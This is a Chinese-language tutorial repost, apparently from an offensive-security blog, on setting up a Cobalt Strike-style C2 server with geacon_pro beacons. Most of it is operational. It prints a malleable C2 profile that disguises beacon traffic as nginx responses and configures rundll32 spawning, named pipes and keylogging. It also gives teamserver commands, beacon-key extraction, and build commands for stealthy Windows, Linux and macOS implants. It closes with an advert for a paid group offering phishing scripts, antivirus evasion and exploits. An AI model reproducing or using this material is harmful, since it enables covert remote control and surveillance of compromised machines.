原文:https://www.cnblogs.com/xzajyjs/p/17638743.html
修改server端和client端的properties,保持一致。这里使用默认的geacon_profile进行测试,上传到server端,保存为geacon.profile
set sleeptime "3000";https-certificate {
set C "KZ";
set CN "foren.zik";
set O "NN Fern Sub";
set OU "NN Fern";
set ST "KZ";
set validity "365";
}
http-get {
set uri "/www/handle/doc";
client {
metadata {
base64url;
prepend "SESSIONID=";
header "Cookie";
}
}
server {
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}
http-post {
set uri "/IMXo";
client {
id {
mask;
netbiosu;
parameter "doc";
}
output {
mask;
base64url;
prepend "data=";
append "%%";
print;
}
}
server {
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}
post-ex {
set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";
set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
set keylogger "SetWindowsHookEx";
}
CatServer.properties
配置文件中添加一行如下:
CatServer.profile = geacon.profile
运行服务端
chmod +x teamserver TeamServer.prop
sudo ./teamserver
客户端连接
接下来生成一个监听器listener,主要要使用https
,如果是http
需要将geacon_pro
的config.go
中sslHTTP
改成"http://"
使用BeaconTool
工具,读取server端的隐藏文件.cobaltstrike.beacon_keys
java -jar BeaconTool.jar -i .cobaltstrike.beacon_keys -rsa
config.go文件中需要修改两处
,复制其中的PUBLIC KEY
至config中对应位置,修改C2地址为监听器的url
// 配置环境变量
SET CGO_ENABLED=1
SET GOOS=windows
SET GOARCH=amd64
// 编译命令
go build main.go
//压缩编译
go build -ldflags="-H windowsgui -s -w " -trimpath main.go
-ldflags="-H windowsgui"
SET CGO_ENABLED=0
SET GOOS=linux
SET GOARCH=amd64
go build main.go
SET CGO_ENABLED=0
SET GOOS=darwin
SET GOARCH=amd64
go build main.go
其中mac上线如下图
Try师傅的
catcs4.5
项目以及
geacon_pro
项目以及
BeaconTool.jar
公众号后台回复
cs45
即可获取
帮会「专注于实战攻防」:
一、实战攻防中的经验分享,比如如何快速打点、快速维权、快速横向等。
二、社工钓鱼信息收集分享、对应话术快速编写方法传授。
三、社工钓鱼实战案例脱敏分享、攻防实战案例分享。
四、免杀研究分享,各种免杀案例代码与经验分享。
五、SRC漏洞挖掘案例脱敏分享。
六、帮会内部提供教程、文档、工具、POC/EXP以及各种安全学习笔记等。
目前加入方式为付费加入和原创内容输出加入。这里说一下原创内容输出加入条件和后续章程。
内容输出方面:
可以是安全技术文章,也可以是安全相关本人原创工具,必须为本人原创且首发。发送到邮箱:[email protected],审核通过后可以特邀嘉宾的方式加入帮会,时间为一年。